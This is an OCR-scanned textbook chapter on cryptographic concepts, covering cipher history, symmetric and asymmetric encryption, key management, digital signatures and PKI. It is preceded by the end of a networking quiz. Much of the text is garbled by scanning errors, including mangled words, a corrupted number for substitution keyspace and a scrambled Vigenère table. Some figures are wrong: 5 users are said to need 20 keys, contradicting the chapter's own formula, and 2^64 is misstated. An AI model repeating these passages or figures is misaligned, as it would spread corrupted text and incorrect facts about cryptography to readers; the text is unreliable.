C. B(iP Is used as a routable protocol,
‘.vhereus Rli’ is ; : online iL;jl oL.

\X Roll [able prulocols iire used to delinc [ he best
path from point A to point B> while routing
|H”oloi o\> iwv useil :e 1i-;uls|jpj 1 ihc du\i.

1. WhcLl is another way used lo describe Ethernet:

A. Collision detection

B. Sends traffic to all nodes on a hub

C. CSMA/CD

D. All of the above

&. Botnets are used to bypass the functionality
of a switch.

A. True

B. False

1. What is a security vulnerability found in RIP?

A. Slow convergence

B. Travels only 5 fs hops

C. No authentication

D. Distance vector

1. Which of [lie following best describes
the role of LP?

A. (Guaranteed delivery

B, Best effort at delivery

L\ l-sUil:l:shes sesshni^ h meiiii*-

of a handshake process
ll is considered an OSl Layer 2 protocol

Cryptographic Concepts

N THE FIELD OF INFORMATION SECURITY, there are a handful of topics that
serve as the foundation to understanding other technologies. One of these
foundations is cryptography, which is a body of knowledge that deals with
the protection and preservation of information. Cryptography is one of the
techniques woven into the very fabric of other technologies including IP Security
(IPSec), certificates, digital signatures, and many others. Common examples of
cryptography in use include Wired Equivalent Privacy (WEP), Wi-Fi Protected
Access (WPA), and 802.11 i (WPA2), not to mention Secure Sockets Layer (SSL),
just to name a few. With a firm grasp of cryptography in hand, you can fully
understand other technologies and techniques — and their proper applications.

Cryptography provides information protection in the areas of confidentiality
and integrity as well as providing the additional advantages of non repudiation.
If applied properly, cryptography can provide robust protection that would not
otherwise be possiole. Confidentiality is :he ab::i:y to pro “.eel information from
unauthorized disclosure; information cannot be viewed by those not authorized
access. Integrity is provided through the cryptographic mechanism known as
hashing, Nonrepudiation provides the ability to prevent a party from denying
the origin of the information in question. You can use cryptographic techniques
to provide these same solutions to information both in transit and in storage.

From another perspective, it is important to understand cryptography in order
to properly evaluate systems. Understanding the different types of cryptographic
algorithms can make evaluating software and services easier by providing
insight into how something is supposed to work. Furthermore, understanding
cryptography allows the ethical hacker to understand how to properly evaluate
systems to look for weaknesses and better understand threats. Password
cracking, authentication systems testing, traffic sniffing, and secure wireless
networks are all mechanisms that use encryption and. are common mechanisms
that are tested by ethical hackers on behalf of clients.

This chapter covers the following topics and concepts:

■ What the basics of cryptography are

• What symmetric encryption is

■ What asymmetric encryption is

• What the purpose of public key infrastructure (PKI) is
What hashing is

What common cryptographic systems are
What cryp tana lysis is

Chapter 3 Goals

When you complete this chapter, you will be able to:

Describe the purpose of cryptography

• Describe the usage of symmetric encryption

• Detail components of symmetric algorithms such as key size,
block size r and usage
• Show the importance of asymmetric encryption and how it provides
integrity and non repudiation

• Describe common asymmetric algorithms

• ■ Identify the purpose and usage of hashing algorithms

• Explain the concept of collisions
• State the purpose of digital signatures

• ■ Explain the usage of PKI

• Identify common cryptographic systems
• Describe basic password attack methods

• 52

PA RT 1 H ac ke r Techn iq ues and Too I s

^ NOTE

Many forms of encryption have
been used throughout history.
In World War II, the German
Enigma and Japanese JN-25
systems were used widely (and
broken by Allied cryptographers).

Cryptographic Basics

Cryptography provides eiii invaluable service to security by providing a means to
safeguard in for ma Lion a gains! unauthorised disclosure, and also provides a means to
detect modification of information. Cryptography additionally provides the ability to have
confidence as to the true origin of information through what is known as no n repudiation.

Cryptography is not a new technique, and understanding some of the older techniques
may assist in understanding the process. Several forms of cryptography appear
throughout history: for example. Julius Caesar used a cipher to communicate sensitive
information with his generals. The cipher works by means of what is known as a key shift,
in which each character in a message is moved the same number of spaces to the left or
right. I Caesar used a key of 3, meaning A encrypted to 13. B encrypted to E, and so on.)

We call ciphers that are similar to what he used “Caesar
ciphers.” While simple in practice and easily broken today, the
cipher preserved confidentiality for two reasons: illiteracy was
high outside the Roman Empire, and anyone who was literate
might assume that the message was in another language. Indeed
only those who knew what they were looking at could revcr.se
the process and, presumably, these people were limited to Caesar
and his generals, As one can see. encryption, while not a new
technique, still has the same function to protect information
from all but the authorized parties.
Understanding the information-hiding or confidentiality aspect of encryption
requires that one understand several terms and concepts starting with codes and ciphers.
Codes and ciphers have a history of being used interchangeably, but this is not correct.
Specifically, codes are a mechanism that relies on the usage of complete words or phrases,
whereas ciphers utilize single letters to perform encryption. Some common forms of
ciphers include substitution (the Caesar cipher is a type of substitution), stream, and
block. Many forms and types of ciphers and codes exist, but each one tends to share the
goal of confidentiality of information. In today’s world, ciphers and codes lire used in
cryptographic systems to protect e-mail, transmitted data, stored information, personal
information, and e-commerce transactions.

The next area that is commonly associated with and involves encryption is authenti-
cation. Authentication is the process of positively identifying a party as a user, computer,
or service. Authentication is being used more often in the software industry to ensure that
applications software and items such as software drivers are actually genuine. In the case
of software-based items, authentication is used in the form of a digital sign ature to show
that a piece of so Ilia hit \ < iimuirie. Authentication of drivers plays a vital role in system
stability because having a driver signed and verified as coming from the actual vendor and
not from some other unknown (and un trusted) source assures that the code in question
has met certain standards. Authentication in the context of electronic messaging provides
the ability to validate that a message has come from a source that is known and can be
trusted. With messaging authentication in place, you can have a system where messages

CHAPTER 3 Cryptographic Concepts

that can no I. be authenticated are not accepted as being genuine. Finally, encryption plays
ei prominent role in the actual authentication process. Consider that the information used
to authenticate an identity such as a PIN or password needs to be kept secret to prevent
disclosure to unauthorised parties. For example, through the use of hashing, passwords
don’t need to be transmitted over a network (the hashes are instead), and they can be
compared with what is previously known without sending the password. Because the
hashes would already he associated with a known user, if the two hashes match (the one
transmitted and the one stored and associated with the user), then the user can be said
to be validated .

Two well-known examples or protocols in which encryption can play an important
role are File Transfer Protocol (FTP) and Telnet. Both were designed at a time when
security threats weren’t considered as they are today. In practice FTP and Telnet do not
include any form of encryption or protection, which means that the ii u E hen 13ca lion and
data transmission processes are all easily viewable by software such as packet sniffers.
Through the introduction of additional mechanisms that can provide encryption where
these protocols cannot, it is possible to overcome the limitations of the protocol by
encrypting or hashing the passw r ord prior to transmission, thereby keeping the password
secret during transmission. An even better solution to the challenges posed by having FTP
and Telnet is to use Secure .Shell (SSI I) instead, which encrypts the logon and transmission
of information. Virtual private netw T orks (VPNs) also use authenticEition, but instead of
a deartext username and password, Lhey use special tunneling protocols that leverage the
power of encryption to provide security for data. VPNs can also leverage other techniques
that rely on cryptographic techniques such as digital certificates and digital signatures to
more accurately identify the user and protect the authentication process from spoofing.

Integrity is another widely used and important role of cryptography. Integrity is the
ability to verify that information has not been altered and has remained in the form
originally intended by the creator. Consider the potential impact of a receiving a piece of
information that has been altered at some point between the sender and receiver — if such
information were altered to say yes instead of no or up instead of down, the results could
be catastrophic, Envision a scenario in which you receive an official but nonconfidential
message from a business partner, stating that a customer ivEinls to purchase a product
for $SO, 000. Consider what would h tip pen in this scenario if instead of$50,000 an
unethical customer intercepted aiu! ..Itered the message to say $5.00, Obviously, if this happens often, it could cause a company enough losses that they would be out of business or suffer significant financial loss. You can see that integrity is very important to detecting alterations to data, but it cannot preserve confidentiality on its own. Following confidentiality and integrity of information is n on repudiation, or the ability to have definite proof that a message originated from a specific party. Common examples of no n repudiation measures are digital certificates and message authentication codes (MACs), One of the more common uses of no n repudiation is in messaging or e-mail systems. In an e-mail system, if nonrepudiEition mechanisms are deployed, usually through digital signatures, it is possible to achieve a state where every official message can be confirmed as coming from a specific party or sender. In such systems, it w r ou Id be nearly PART 1 Hacker Techniques and Tools rC FYI Over the last few years, technologies Such as BitLocker by Microsoft and True Crypt have emerged as solutions to the encryption of data on hard drives. With the introduction and increased accessibility of volume encryption solutions, more organizations are practicing information safety by encrypting the drives of portable devices as well as removable devices such as USB flash drives and hard drives. impossible for an individual to deny sending a message because the digit til signature can be applied only by the person who has exclusive access to the private key. In enterprise or high-security environments, a state in which it is impossible for el party to deny sending a message or initiating an action is desirtible. Also consider another fact of today’s world: with the Internet allowing communication between parties who may never meet, having no n repudiation to track an action back to a specific pEirty is a benefit. A common example of a nonrepudiation measure is the digital signature; additional measures include digital certificates and MACs. Up to this point, a lot of attention has been given to the value of encryption for trans- mission and verification of data in storage. In today’s work environment, increasing numbers of workers are being provided laptops or other similar mobile devices to work on the road. These mobile devices are misplaced now and then, and whether the device is stolen or left behind at an airport security checkpoint, the problem is still the same: the data on the system is lost. For example, the U.S. Department of Veterans Affairs ( VA) and the Transportation Security Agency (TSA) have lost laptops containing highly sensitive information that included personal information of patients, in the former example, and personal data on registered travelers, in the latter. In both cases and in numerous others, the impEict could have been lessened if encryption had been used to pro tec 1 l ho hnrd drives of the laptops. Of course, encryption cannot prevent the loss or theft of a device, but it can serve as a formidable obstacle for whoever finds it, preventing them from obtaining sensitive information. Many state, local, and federal agencies have made it mandatory to encrypt bard drives or laptops in order to lessen the potential imptict of a lost device. For example, in the state of California, Senate Bill 1386 provides legal protection for entities t hat accidentally disclose information if the hard drives on those systems can be shown to have been encrypted. Within encryption, there are two types of cryptographic mechanisms: symmetric and asymmetric. The differences between the two mechanisms are significant. Symmetric cryptography is a mechanism that uses a single shared key for encrypting and decrypting. The alternative method is asymmetric cryptography, which utilizes two keys, one public and one private; what is performed with one key can only be reversed with the other. At this point, it is important to understand that for both symmetric and asymmetric cryptography, data is encrypted by applying the key to an encryption algorithm. The algorithm uses the key to perform mathematical substitutions, transpositions, permutations, or other binary math on plaintext to create ciphertext. CHAPTER 3 Cryptographic Concepts Substitution ciphers replace each letter or group of letters with another letter or group of letters. Probable words or phrases can be guessed by knowing the language in which the original unencrypted message was written. Substitution ciphers preserve the order of the plaintext symbols but disguise them. An example of a simple substitution cipher can be found in many daily newspapers in the puzzle section. Although there are 15,51X^10,043,3 31,QOQ,QOQ f 09Q,0QQ (15 septillion] possible keys, because the substitution cipher preserves so much of the original information h the correct key can often be discovered by an average person over a cup of coffee. This demonstrates that just because tin encryption scheme has a large number of possible keys, it isn’t necessarily secure. It is the algorithm that creates security. Don’t be confused by vendors who claim their solutions are better because they support longer keys, .Size isn’t everything in cryptography. Transposition ciphers are different from substitution ciphers in that they reorder the letters but do not replace them. The cipher is keyed by use of a word or phrase. Cryptographic History Humans have been using cryptographic techniques for thousands of years: the only things that have changed are the complexity and creativity of the techniques. Cryptography covers the confidentiality, integrity, and nonrepudiation of information, but at one point cryptography referred solely to protecting the confidentiality of infor- mation, A quick look hack into history shows some of the ways that encryption was used: Egyptian hieroglyphics — In some circles, the hieroglyphics painted on the walls of temples and tombs were a form of encryption because only specific parties were able to understand them. This was a type of substitution cipher. Scytale — The Spartans used this technique to send encoded messages to the front line. It used a rod of fixed diameter with a leather strap that was wrapped around it. The sender wrote the message lengthwise, and when the strap was unwound, the letters appeared to be in a meaningless order. By re wrapping on 1 he i’onvot dimncier rod. ihe si nip would line up. mid the message was revealed. This was a type of transposition cipher. • Caesar cipher — A type of substitution cipher in which each letter in the plaintext is replaced by a letter some fixed number of positions down the alphabet (see Figure 3-1 ). ABCDEFGHIJKL FIGURE 3-1 Caesar cipher. X Y 2 A 6 C D E FH IJ K L PART 1 Hacker Techniques and Tools Polyalphabetic cipher (Vigenere cipher) — A substitution cipher that uses multiple substitution alphabets, as shown in Figure 3-2. Vigenere ciphers consist of simple poly alphabetic ciphers similar to and derived from Caesar ciphers. Instead of shifting each character by the same number, as with a Caesar cipher, text or characters located at different positions are shifted by different numbers. Enigma — An electromechanical rotor machine used for the encryption and decryption of classified messages used by Germany during World War II. JN-25 — An encryption process used by the Japanese during World War II to encrypt sensitive information. Allied cryptographers broke the JN-2 5 code, and American military leaders were able to use this to their advantage. For example. Admiral Nimitz knew the intended location of the Japanese fleet when it launched its attack on the island of Midway on June 4. 1942. As a result, the American fleet located the fleet and won a decisive victory, defeating a superior force with the element of surprise (and some luck.) Concealment cipher — The message is present but concealed in some way: as an example, the hidden message may be the first letter in each sentence or every sixth word in a sentence. A B C D E F G H 1 J K L M ISI O P Q R s T U V W X Y 2 A A B C D E F G H 1 J K L M N 0 P Q R s T u V w X Y Z B B C D E F G H 1 J K L V N 0 P 0 R £ T U V W X Y z A C C D E F G H 1 J K L M N 0 P 0 R S T U V w X Y Z A B D D E F G H 1 J K L M N 0 P Q R S T U V W X Y 2 A B C E E F G H 1 J K L M N G P Q R £ T U V W X Y Z A B C D F F G H 1 J K L M N 0 P Q R £ T U V w X Y 2 A B C D E G G M 1 J K L M N 0 P Q R S T U V w X Y 2 A B C D E F H ■1 1 J K L M N 0 P 0 R S U V w X Y z A B C D E F G 1 1 J K L M N 0 P 0 R £ T U V w X Y 2 A B C D E F G H J J K L M N 0 P 0 R S T U V W X Y z A B C D E F G H 1 K K L M N 0 P Q R S T U V w X Y z A B C D E F G H 1 J L L M N 0 P Q R £ T U V W X Y Z A B C D E F G H 1 J K M M N O P Q R S T U V w X Y Z A B C D L F G ■1 1 J K L N N 0 P Q Ft £ T U V W X Y z A B C D E F G H 1 J K L M 0 0 P Q S T U V W X Y 2 A B C J E F G H 1 J K L V N P P Q R S T U V W X Y 2 A B C D E F G H 1 J K L M N 0 Q 0 R S T U V W X Y z A B C D E F G H 1 J K L M N O P R R S T U V w X Y 2 A B C D E F G H 1 J K L M N O P Q S £ T U V W X Y 2 A B C D E F G H 1 J K L M N 0 P G R T T U V w X Y Z A B C D E F G H 1 J K L M N 0 P 0 R S U U V w X Y Z A B C ‘J E F G H 1 J K L V N 0 P 0 R S [ V V w X Y Z A B C D E F G H 1 J K L :V N 0 P 0 R S T U W W X Y 2 A B :: D E F G H 1 J K L M N 0 P 0 R S T U V X X Y 2 A B C D E F G H 1 J K L M N O F 0 R £ T u V w Y Y 2 A B c D E F G H 1 J K L M N O p Q R £ T u W X Z 2 A B C D E F G il 1 J K L M N 0 P 0 R S T U V w X Y FIGURE 11 Polyalphabetic cipher. CHAPTER 3 Cryptographic Concepts Cryptography is also seen in places where it is not normally expected, s uch as games. Cryptography has shown up in children’s puzzles., on the back erf cereal boxes, and in video games. And in one of the more creative uses of cryptography, Valve software in early 2010 announced the sequel to the popular game Portal by placing a series of cryptographic puzzles in the original game tnat had to be cracked in order to obtain news on the sequel. Other examples include cryptographic puzzles and hints in TV shows such as Lost that can be solved to get additional clues about the show. Although such examples aren’t used to protect sensitive information, they illustrate other ways the techniques are used. • One-time pad — Uses a large nonrepeating key. Each cipher key character is used exactly once and then destroyed. Keys must be completely random, or nearly so, and must be as long as the message. One-time pads are used for extremely sensitive communications (for example, diplomatic cables). Prior to use, keys must be distributed to each party in a manner that cannot be intercepted (for example, in the ‘”diplomatic pouch” that cannot he opened or inspected by another nation.) Rending the key using the same mechanism as the message would compromise the cipher. Any organization can use cryptography to protect the conlidentiality and integrity of information. Some that have found cryptography useful include corporations, govern- ments, individuals, and criminals — each has used cryptography to preserve security in some way The capabilities of cryptography lie within four areas: • Privacy — Deals with enforcement of one of the pillars of information security: i onEidentiality • Authenticity — The ability to ensure that a piece of data can be verified as being valid and can be trusted. • Integrity — Allows for the detection of alterations in a given unit of information through the process known as hashing. • N on repudiation — The ability to have positive proof that a message or action originated with a certain party. It Is important to separate the ability of encryption to provide confidentiality and integrity. Confidentiality maintains the secrecy of data, but does not provide a way of detecting data alteration, Integrity of data is provided via hashing functions that allow for the detection of alterations of information, but does not provide confidentiality because hashing does not encrypt data . If both integrity and confidentiality are desired, it is possible to combine techniques to achieve both goals, PART 1 Hacker Techniques and Tools Symmetric Encryption Symmetric encryption uses the same key to encrypt and to decrypt information. When encrypting a given piece of in form tit ion, there arc two different mechanisms an algorithm etui use: stream cipher or block cipher. Stream ciphers operate one hit at a time by nppivbiLi ei pseudorandom key to the plaintext. In a block cipher, data is divided into fixed lengths, or blocks (usually 64 bits): all the bits are then acted upon by the cipher to produce an output, The output size of each of these ciphers is the same as the input size, which means they can be used for real-time applications such as voice and video. A large number of encryption algorithms are block ciphers. Here are some basic concepts to understand: ■ Unencrypted data is known as cleartexl or plaintext, Don’t get confused by the four letters at the end (text); clear text and plaintext both refer to information that is still in a format that is understandable to a person or an application (for example, it could be raw video). • Encrypted data is known as cipher text and cannot be understood by any party that does not have the correct encryption algorithm and the proper key. • Keys are used to determine the specific settings to be used for encryption. The key can be thought of as a combination of bits that determines the settings to be used to encrypt or decrypt. Keys can be generated by hashing some keyboard inputs (weak, which could be duplicated through guessing or brute force) or by a pseudorandom number generator (stronger, which is much more difficult to duplicate). There is • a concept called a “weak key, M which means that it causes the algorithm to “”leak” information from plaintext to ciphertext. Often these are keys, such as all zeros or all ones, or some repetiting pattern. Algorithms that use longer keys will have a larger ‘”keys pace” — the universe of all possible keys. The larger the key space, the more computation required by an adversary to try all of them. Longer keys combined with a strong algorithm represent better security. • The quality of its algorithm is of vital importance to the effectiveness of the encryption process. The algorithm del ermines how encryption will be performed and, along with a key. the effectiveness of the cryptosystem. Remember that an algorithm and the length of a key plus I he qualify of the algorithm, determine how secure a system is. Symmetric encryption is in widespread usage in various applications and services as well as techniques such as data transmission and storage. Symmetric, like any other encryption technique, relies on the secrecy of and strength of the key. If the key gener- ation process is weak the entire encryption prikvs> will be weak. CHAPTER 3 Cryptographic Concepts 59 FYI_j— | As technology improves, longer key lengths are generally implemented. In the 1970s and early 1980s, a 56-bit Data Encryption Standard IDES) key was considered to be adequate to resist a brute-force attack for up to 90 years. Today, specially built powerful computers can brute force a DES password in hours. Elliptic curve cryptography, due to the nature of the computations involved, has intrinsically shorter keys (for example, a 256-bit EC key has as much cryptographic strength as a 3,072-bit RSA key, when you consider the algorithm as part of the “strength” {which you must). In symmetric encryption, one key is used for both the encryption and decryption processes; as such, the key must be distributed to all the parties who will need to perform encryption or decryption of data in the system. Due to this arrangement, it is necessary for a process In be in place to distribute the keys to all parties involved because keys cannot be simply transmitted in the same way as the encrypted data lest it be intercepted by unauthorized parties. In symmetric encryption, additional steps are needed to protect the key because the interception of a key will allow unrestricted access to the secured information, To prevent I he unauthorized disclosure of a key to parties not authorized to possess it, you can use what is known as out-of-band communications. Using this technique it is possible to distribute a key in a manner different from the data, thereby preventing someone from intercepting the key with the data. This would be akin to sending an e-mail to someone in an encrypted format and then calling them on the phone and giving them the key. If a large key and a strong algorithm are used with symmetric encryption, the strength of the system increases dramatically, but this strength does not amount to much if the key is accessible to unauthorized parties. An example of symmetric encryption is shown in Figure 3.3. Plaintext This is readable Encryption Ciphertext Wo!@2A !%G31 1523%$

FIGURE 3-1

Symmetric encryption.

Ciphertext

Plaintext

Wol@2A
!%G31
1523%$Decryption Readable again 60 PART 1 Hacker Techniques and Tools Another importEint characteristic that makes symmetric encryption preferable to asymmetric encryption is that it is inherently faster due to the nature of the computa- tions performed. When processing, a large amount of data, this performance advantage becomes significant, To gel the best of both worlds, modern cryptography usually utilizes asymmetric encryption to establish the initial “handshake,” passing asymmetric encryption key from one party to another. That key is then used by both parties to encrypt and decrypt the bulk of the in form at ion. The most widely recognized symmetric-key algorithm is the DES. Other symmetric algorithms include the following: • 3 DES (or Triple DES) — An extended, more-secure version of DES that performs DES three times. Advanced Encryption Standard (AES) — The replacement algorithm for DES that is more resistant to brute-force attack. AILS is designed to make it mathematically impossible to break using current technology ■ Blowfish — A highly efficient block cipher that can have a key length up to 448 bits, • International Data Encryption Algorithm (IDEA) — Uses 64-bit input and output data blocks and features a 128-bit key • RC4 — A stream cipher designed by Ron Rivest that is used by WE P. RC5 — A fast block cipher designed by Ron Rivest that can use a large key size. RC6 — A cipher derived from RC5. ■ Skipjack — A symmetric algorithm of 80 -bit lengths developed by the National Security Agency (NSAL ^ MOTE The security of symmetric encryption is completely dependent on how well the key Es protected. Managing the cryptographic keys is of the utmost importance. The algorithms listed here are only a smalt number of the symmetric algorithms available, but they represent the ones most commonly used in encryption systems. While each is a little different, they do share certain characteristics, such as the common single key to encrypt and decrypt and the performance benefits associated with symmetric systems. r- ( fy’ f Skipjack was developed by the NSA in 1993 to be adopted by telecom companies and embedded in communication devices via the Clipper Chip. With a court order (required because keys were escrowed), NSA would have had the ability to listen in on specific conversations. When the program was made public, popular resentment toward “Big Brother” created suffi- cient political pressure to doom the project by 1996. Oddly enough, ill-informed people seemed to prefer the arrangement where anyone could intercept their unencrypted communications rather than permit the possibility that only the federal government might be able to intercept their encrypted communications, which would have been safe from any other eavesdropper. CHAPTER 3 Cryptographic Concepts 61 To ensure confidentiality among multiple users of a symmetric encryption system, each pair of users must share a unique key. This means the number of key pairs increases rapidly, and for n users, is represented by the sum of all of the numbers from 1 to (n— 1). This is expressed as follows: Cn-1) gi = (n){n-l)/ 2 i = 1 A system of 5 users would need 20 unique keys, and a system of ]()() users would need 4,9 SG unique keys. As the number of users increases, so does I he problem of key management. With so many keys in use, the manager of keys must define and establish a key management program. Key management is the process of carefully considering every- thing that possibly could happen to a key, from securing it on the local device to securing it on a remole device and providing protection against corruption and loss. The following responsibilities all fall under key management: Keys should be stored and transmitted by secure means to avoid interception by an unauthorized third party • Keys should be generated by a pseudorandom process (rather than letting users pick their own keys) to prevent guessing the key. ■ The key s lifetime should correspond with the sensitivity of the data it is protecting and the authorization to use them needs to expire in a timely fashion. • Keys should be properly destroyed when the process for which they were used in has lapsed, The destruction of keys will be defined in the key management policies of the organization and should be done so with respect to those policies. Asymmetric Encryption The other type of encryption in use is asymmetric encryption. It was originally conceived to address some of the problems in symmetric encryption. Specifically, asymmetric encryption addresses the problems of key distribution, generation and non repudiation. Asymmetric-key cryptography is also called public key cryptography, which is the name by which it is commonly known. Asymmetric encryption was derived from group theory, which allows for pairs of keys to be generated such that an operation performed with one key can be reversed only with the other. The key pair generated by asymmetric encryption systems is commonly known as public and private keys. By design, everyone generally has access to the public key and can use it at any time to validate or reverse operations performed by the private key. By extension, any key that has its access restricted to a small number or only one individual becomes a private key he cause not everyone can use it. Anyone who has access to Lhe public key can encrypt data, NOTE The more tbe key is used and the more sensitive the data, the more important ft may become to have a shorter key lifetime. Dr. Whitfield Diffieand Dr. Martin E. Hellman published the first public key exchange protocol in 1976. n 62 PART 1 Hacker Techniques and Tools FIGURE 3-4 Asymmetric encryption. Plaintext This is readable Ciphertext Encryption WqE@2A !%G31 !523%S Receiver’s Public Key O Q Receiver’s Private Key Wo!@2A l%G31 1523%$

Decryption

again

Ciphertext

Plaintext

but only the holder of the corresponding private key can decrypt it. Conversely, if the
holder of the private key encrypts something with the private key. anyone with access to
the public key can decrypt. Figure 3-4 provides an overview of the a symmetric process.

Without getting into too much mathematics, let’s note that asymmetric key cryptog-
raphy relies on what is called MP- hard problems. Roughly speaking, a math problem
is considered to be NP-hard if it cannot be solved in polynomial lime: that is, something
similar to x 2 or x\ An NP-hard problem might require 2 X time to solve. So comparing
these three types of times to solve a problem, x 2 , x\ and 2 E , let’s see what happens when
we increase the size of x, Table 5-1 show r s the results.

table 3-1 Comparison of polynomial-time and NP-hard problems.

X

X 2

X 3

2*

1

1

1

2

10

100

1,000

1,024

32

1,024

32,768

4,294,967,296

64

4,096

262,144

13,446,744,073,709,551,616

100

10,000

1,000,000

1,267,650,600,228,229,401,496,703,205,376

CHAPTER 3 Cryptographic Concepts

Asymmetric cryptography relies an types of problems that are re hi lively easy to solve
one way but are extremely difficult to solve the other way. I lere’s v\ simple example:
Without using a calculator, what is 2 3 3 limes 347? Pretty simple: K() t S51. OK, if you
didn’t know those two numbers, and someone asked you Lo figure out the prime factors
of 8U,8 51 , how would you do it? You’d try dividing by 2. 3, 5, 7* 11 , 13, and so on until
you got up to 233. That takes a while — a lot longer than simply multiplying two numbers.
This is an example of what is called a one-way problem. It’s not really one-way — you can
go backward — it just takes a Jot more work to do so.

With asymmetric encryption, the information is encrypted by the sender with the
receiver’s public key The information is decrypted by the receiver with the private key
Examples of asymmetric algorithms include the following:

■ Diffie-Hellman — A process used to establish and exchange asymmetric keys over
an insecure medium. The “hard” problem It uses is modular logarithms.

• El Gamal — A hybrid algorithm that uses asymmetric keys to encrypt the symmetric
key. which is used to encrypt the rest of a message. Based on Diffie-Hellman, it also
relies on discrete logarithms.

• RSA (Rivest-Shamir-Adelman) — Patented in 19 77. RSA symbolically released

its patent to the public about 48 hours before it expired in 2002. RSA is still used
in various applications and processes such as e-commerce and companibie
applications. In general, this algorithm is not used as much as it once was due
to performance and overhead, and as a result it has been replaced with newer
algorithms. RSA is based on the difficult problem of factoring two large primes
(similar to the previous calculation exerciser

• Elliptic curve cryptography (ECC) — This is based on the difficulty of solving the
elliptic curve discrete logarithm problem (which we won’t even think of getting
into here). Because the algorithm is so computationally intensive, shorter key
lengths offer better security relative to other algorithms using the same key length.
These shorter keys require less power and memory to operate, w T hich means ECC
may be used more often on mobile devices or devices with lesser processor power
or battery pow r er.

The strength of asymmetric encryption is that it addresses the most serious problem
of symmetric encryption: key distribution. Although symmetric encryption uses the
same key to encrypt and decrypt, asymmetric uses two related but different keys that
can reverse whatever operation the other performs. Due to the unique properties that
are a characteristic of asymmetric encryption, simply having one key does not give
insight into the other. A public key can be placed in a location that is accessible by anyone
who may need to send information to the holder that has the corresponding private key.
Someone can safely distribute the public key and not worry about compromising security
in any way. This public key can be used by anyone needing to send a message to the

64

PART 1 Hacker Techniques and Tools

owner of the public key. Because once the public key is used to encrypt a message, it
cannot be used to decrypt that message. Thus, there is no fear of unauthorized disclosure.
When a message is delivered, it is decrypted with the private key Users must keep
their private keys protected at alt times. If com prom ised> they could be used to forge

messages and decrypt previous messages that should remain private.
Similarly, directories that house public keys must resist tampering
or compromise. Otherwise, an attacker could upload a bogus public
key to the public repository, and messages intended for the real
of asymmetric crypto logy is that the algorithms take much longer
to process, and thus it suffers from performance issues in comparison
with symmetric encryption. These performance shortcomings become
very apparent with bulk data, which is why asymmetric keys are often
used to just to exchange the symmetric key used to encrypt the rest
of the message stream.
To better understand the difference between symmetric and asymmetric encryption,
take a moment to review Table 1-2.

NOTE

Asymmetric encryption can
employ functions known
as trapdoor functions,

which are functions that
are easy to compute in one
direction, but tough to do
so in the other.

table 3-2 Comparison

of asymmetric and symmetric encryption.

FEATURE

SYMMETRIC ENCRYPTION

ASYMMETRIC ENCRYPTION

1. Number of keys

One key shared by two
or more parties

Pairs of keys

1. Types of keys used

Key is secret

One key is private and one key
is public

1. Loss of keys can result

in Disclosure and modification

Disclosure and modification for
private keys and modification
for public keys

1. Relative speeds

Faster

Jilowi^r^^^^^^^^^^^^^^^^H

1. Performance

Algorithms are more
efficient

Algorithms are less efficient

1. Key length

Fixed key length

Fixed or variable key lengths
(algorithm-dependent)

1. Application

Ideal for encrypting files
and communication
channels

Ideal for encrypting and
distributing keys and for
providing authentication

CHAPTER 3 Cryptographic Concepts

What should be protected: the algorithm or the key? Auguste Kerckhoffs published a paper
in 1883, stating several principles about stronger and better encryption; among these principles
was the idea that the only secrecy involved with a cryptography system should be the key.
The idea was that the algorithm should be publicly known while the key kept secret This debate
is still argued today, with some believing that all algorithms should be publicly available and
scrutinized by experts in Order to make the algorithm better. Others in the field argue that the
algorithm should be kept secret as well to provide security in layers because an attacker would
have to uncover the key and the algorithm to attempt an attack.

Digital Signatures

Another capability provided by cryptographic technologies is that of digital signatures.
Digital signatures arc a combination of public key cryptography and hashing. First, to
understand what a digital signature is designed to provide and what the cryptographic
techniques are meant to do, consider what a traditional signature is designed to provide.
In a traditional signature on a document, two features are offered. First, the signature
of an individual is unique to that individual and therefore proofofthat person’s identity.
The other ability offered with traditional signatures is implied by the document il is
written on; when a person signs a document, he or she is providing a means of proving
which document he or she agreed to. This process can be considered an exercise in
nonrepudiEition because the signature is unique to that person, and integrity because
the signature is applied only to the document that person agreed to.

Digital signatures are a com hi nation of public key cryptography and hashing, To create
a digital signature, two steps take place that result in the actual signature that is sent with
data. First, the message or in formal ion to be sent is passed through a hashing algorithm
that creates a hash to verify the integrity of the message. Second, the hash is passed
through the encryption process using the sender’s private key as the key in the encryption
process. This signature is then sent, along with the original unencrypted message, to a
recipient who can reverse the process. When the message is received with the signature,
the receiver will first validate the identity of the sender and then retrieve the public key
to decrypt the signature. Once the message is decrypted, the hash is revealed: at this point
the receiver will run the same hashing algorithm to generate a hash of the message.
Then l he hashes, both l he original and the one newly (.Tea led. sinus Id match: ii’ lin-v
do not, the message has been altered; if they do, the message has been proven to come
from a specific party and has been unaltered. Figure 3-5 shows an example of a digital
signature in use.

PART 1 Hacker Techniques and Tools

Signing

Verification

1O0011O1O1O1

Hash
Function

Hash

Data

Certificate

Encrypt hash
using signer’s
private key

rrO

10001 1010101

Signature

Attach to
Data

Digitally Signed
Data

FIGURE 3-5

The use of a digital signature,

Digitalty Signed m|
Data

100011010101

Data

Hash
Function

Decrypt using
signer’s public
key

100011010101
Hash

10001 1010101
Hash

If the hashes are equal, the signature is valid.

Purpose of Public Key Infrastructure

One of the more commonly used mechanisms Lhat involve cryptography is that of public
key infrastructure (PKI]l PKI provides a mechanism through which two parties can
establish a trusted relationship even if the parties have no prior knowledge of one another.
For an example of PKI in use, consider e- commerce applications that are used to purchase
products or services online. Examine the environment that e-com merce functions in and
contrast it with how things work in the real worJd. In the real world, you can walk into a
store, see who it is you are dealing with face to face, and get a sense of whether you should
trust the business or not. In cyber space h a trust relationship is much harder to establish
because you cannot just walk into a real- world store, either because said store is not
nearby or a brick and mortar storefront does not exist. In such situations, you cannot
see whom you are dealing with and hcive to decide whether to trust the business or not.

CHAPTER 3 Cryptographic Concepts

PKl addresses these concerns and bring trust, integrity, and security to electronic transac-
tions. The FKl framework exists to manage, create, store, and distribute keys and digital
certificates safely and securely, The components of this framework include the following:

• Certificate Authority (CA) — The entity responsible for enrollment, creation ,
management, validation, and revocation of digital certificates

• Registration Authority (RA) — An entity responsible for accepting information
about a party wishing to obtain a certificate; RAs generally do not issue
certificates or manage certificates in any way In some situations, entities
known as Local [Registration Authorities (LRAs) are delegated the ability

to issue certificates by a CA.

• Certificate Revocation List {CRL) — A location in which certificates that
have been revoked prior to their assigned expiration are published

• Digital certificates — Pieces of information, much like a driver’s license
in the real world, that are used to positively prove the identity of a person,
party, computer, or service

• Certificate Distribution System — A combination of software, hardware,
services, and procedures used to distribute cert It leal es

The issue of key management becomes much larger as the pool of users interacting with
